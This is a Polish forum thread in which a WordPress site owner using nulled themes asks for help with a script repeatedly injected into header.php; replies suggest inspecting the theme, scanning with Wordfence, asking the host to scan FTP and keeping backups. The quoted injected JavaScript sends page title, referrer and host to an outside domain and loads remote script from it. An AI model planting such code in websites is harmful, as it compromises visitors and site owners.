Skocz do zawartości

Złośliwy kod Wordpress


mamoney

Rekomendowane odpowiedzi

Witam!

Od kilku dni bez przerwy moją stronę atakuje mnie złośliwy kod, który zamieściłem poniżej. Przez to Google pokazuje moją witrynę jako niebezpieczną, blokując treść. Miał ktoś z Was może taki problem lub wie, jak go zwalczyć?

- zmiana szablonu nie pomaga, w drugim szablonie również zostaje dodawany szkodliwy skrypt
- moje szablony - niestety nulled, ale wcześniej nie miałem z nimi takiego problemu, przyczyn powinna tkwić gdzieś indziej
- przeskanowałem komputer MalwareBytes i usunąłem szkodliwe pliki, które znalazł on podczas skanowania

Dalej... nie wiem co robić, prosiłbym o pomoc!

Cytuj

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host); var base = "http://ublaze.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '')
{document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Odnośnik do komentarza

Zarejestruj się za darmo i naucz się zarabiać online!

  • Dostęp do darmowych poradników pokazujących krok po kroku jak zarabiać w Internecie
  • Sposoby zarabiania niepublikowane nigdzie indziej
  • Aktywna społeczność, która pomoże Ci rozwiązać problemy i doradzi
  • Profesjonalne treści na temat SEO, social media, afiliacji, kryptowalut, sztucznej inteligencji i wiele więcej!

Niestety tak jest jesli chcesz motyw premium, a używasz nulled. Myślałeś, że fajny motyw będzie bez bajerów? :troll:
Na 100% header.php do przeanalizowania i tam szukasz swojego problemu.

  • Super 3
Kompleksowy mentoring bezpieczeństwa i anonimowości w internecie   

Kompleksowy mentoring - BEZPIECZEŃSTWO I ANONIMOWOŚĆ
Nie daj się śledzić, ukrywaj tożsamość online i offline, zabezpiecz swoje urządzenia i sporo więcej!

Odnośnik do komentarza
42 minut temu, mamoney napisał:

Tak, kod oczywiście usunąłem z header.php, jednakże w przeciągu 3 dni pojawia się on tam ponownie... A jak przeskanować serwer?

Ściągnij plugin Wordfence:

https://pl.wordpress.org/plugins/wordfence/

i przeskanuj nim bloga powinien wykryć shakowane pliki. Na pewno przejrzyj tez header.php tam musi być złośliwy kod.

                                                                                                                                                                          Przydatne/Pomogłem? KLIKNIJ: arrw.jpg:)

Domeny na sprzedaż: SURFBAR.PL ; FilmyBezLimitu.pl  kontakt przez priv.

Odnośnik do komentarza
Godzinę temu, mamoney napisał:

Problem w tym że... Taki problem zaczyna też pojawiać się na innych moich domenach.

Więc na Twoim ftp musi być złośliwe oprogramowanie. Napisz do admina swojego serwera niech przeskanują Twój ftp, będziesz wiedział co i jak.

Już dzisiaj doradzałem to jednemu userowi na MC. Backupy przynajmniej raz w tygodniu (jak rzadko wrzucasz content) i po problemie. Wpada robak na wordpresy to czyścisz, przywracasz backupy i po sprawie :) ftp

                                                                                                                                                                          Przydatne/Pomogłem? KLIKNIJ: arrw.jpg:)

Domeny na sprzedaż: SURFBAR.PL ; FilmyBezLimitu.pl  kontakt przez priv.

Odnośnik do komentarza
6 godzin temu, Earn.pl napisał:

Ściągnij plugin Wordfence:

https://pl.wordpress.org/plugins/wordfence/

i przeskanuj nim bloga powinien wykryć shakowane pliki.

Nie jestem do końca pewny ale coś mi świta, że ów plugin skanuje motywy tylko z oficjalnego repozytorium wordpressa, więc jeśli jest nulled to nie bardzo zadziała lecz mogę się mylić!

  • Super 2
Kompleksowy mentoring bezpieczeństwa i anonimowości w internecie   

Kompleksowy mentoring - BEZPIECZEŃSTWO I ANONIMOWOŚĆ
Nie daj się śledzić, ukrywaj tożsamość online i offline, zabezpiecz swoje urządzenia i sporo więcej!

Odnośnik do komentarza
15 minut temu, Harry napisał:

Nie jestem do końca pewny ale coś mi świta, że ów plugin skanuje motywy tylko z oficjalnego repozytorium wordpressa, więc jeśli jest nulled to nie bardzo zadziała lecz mogę się mylić!

Też nie jestem pewien czy pod nulled działa bo nigdy pod nulled nie próbowałem.

Ale zawsze warto spróbować :)

                                                                                                                                                                          Przydatne/Pomogłem? KLIKNIJ: arrw.jpg:)

Domeny na sprzedaż: SURFBAR.PL ; FilmyBezLimitu.pl  kontakt przez priv.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Polecana zawartość

    • Poradnik podatkowy - jak rozliczać się z pieniędzy zarobionych przez Internet bez DG?
      Zarabianie w Internecie wiąże się z koniecznością płacenia podatków - a rozliczanie się z urzędem skarbowym nie jest jednoznaczne i proste. Prawo podatkowe w Polsce jest nieujednolicone - co oznacza, że każdy urząd skarbowy może mieć inne interpretacje. Sprawdź jak się za to zabrać!
        • Lubię to!
        • Super
      • 12 odpowiedzi
    • JDG - Jak zarejestrować, rozliczać i prowadzić działalność gospodarczą w Polsce
      Jednoosobowa działalność gospodarcza (JDG) to najprostsza forma prowadzenia działalności gospodarczej w Polsce. Jest to działalność prowadzona przez jedną osobę fizyczną na własne nazwisko i na własne ryzyko. Jednak mimo, że nazywa się jednoosobowa - daje jednak możliwość zatrudniania pracowników. Takich firm jest zarejestrowanych w Polsce zdecydowanie najwięcej. Sprawdź jak zarejestrować, rozliczać i prowadzić własną JDG!
        • Super
      • 3 odpowiedzi
    • Inwestowanie w obligacje detaliczne skarbu państwa - od podstaw!
      Sprawdź jak inwestować w obligacje skarbowe - krok po kroku! Detaliczne obligacje skarbowe to rodzaj obligacji emitowanych przez Państwo, które są oferowane indywidualnym inwestorom, takim jak osoby fizyczne, a nie instytucjom finansowym.

      Są to instrumenty dłużne, nienotowane na żadnym rynku, co oznacza że kupując taką obligację, w praktyce pożyczasz pieniądze państwu na określony czas, a w zamian otrzymujesz odsetki. Można więc powiedzieć że obligacje są indywidualną pożyczką na określony % dla Skarbu Państwa. Państwo odda Ci więcej niż od Ciebie pożyczyło.
        • Super
      • 7 odpowiedzi
    • Jak pozyskiwać i zarabiać na poleconych dzięki make-cash.pl
      W tym poradniku przedstawiam możliwości dostępne dla każdego użytkownika. Dowiesz się jak efektywnie wykorzystać forum do zbierania poleconych i budowania dodatkowych zysków.

      Make-cash.pl to miejsce, gdzie ludzie dzielą się swoimi doświadczeniami, poszukują porad i rekomendacji, a także nawiązują wartościowe kontakty. Codziennie odwiedza nas minimum 2000 unikalnych osób, które są zainteresowane zarabianiem przez Internet - a to ogromny potencjał, z którego może korzystać nie tylko administracja - ale każdy użytkownik forum !
        • Super
      • 2 odpowiedzi
    • Jak pisać treści na stronę internetową z wykorzystaniem AI
      Tworzenie treści od podstaw może być procesem czasochłonnym. Istnieje wiele mniejszych kroków, o których należy pomyśleć w drodze do stworzenia atrakcyjnych treści, takich jak badanie rynku, SEO i redagowanie tekstu, a to tylko początek. Jednak nie musisz zaczynać od zera, gdy istnieją narzędzia AI, które mogą pomóc w tworzeniu wysokiej jakości treści. 
        • Dzięki!
        • Super
      • 13 odpowiedzi
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Ta strona korzysta z ciasteczek, aby świadczyć usługi na najwyższym poziomie. Dalsze korzystanie z witryny oznacza zgodę na ich wykorzystanie. Polityka prywatności .